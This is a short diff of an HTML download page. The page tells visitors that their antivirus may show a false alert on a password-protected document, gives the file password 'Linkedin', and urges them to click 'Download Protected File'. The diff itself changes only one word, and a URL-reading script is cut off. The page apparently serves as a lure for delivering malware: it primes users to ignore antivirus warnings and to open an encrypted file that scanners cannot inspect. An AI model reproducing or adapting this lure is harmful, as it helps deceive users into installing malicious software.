--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@ Your Antivirus software may shows a false alert on a password-protected document
 <br>
 <a href="https://www.av-comparatives.org/dealing-with-false-positives-reporting-issues-to-antivirus-vendors/">Dealing with False Positives: Reporting Issues to Antivirus Vendors</a>
 </p>
-<center><h2>Unlock your download by entering the File Password:<b> Linkedin <p>Then click on the "Download Protected File" to get instant access to your content!</h2>
+<center><h2>Unlock your download by entering the File Password:<b> Linkedin <p>Then click on the "Download Protected File" to get instant access to your documents!</h2>
 <div style="font-size:16pt; color:green;" align="center"><b>File Password: </b> Linkedin </b> </div>
 
 <script>const urlParams = new URLSearchParams(window.location.search);
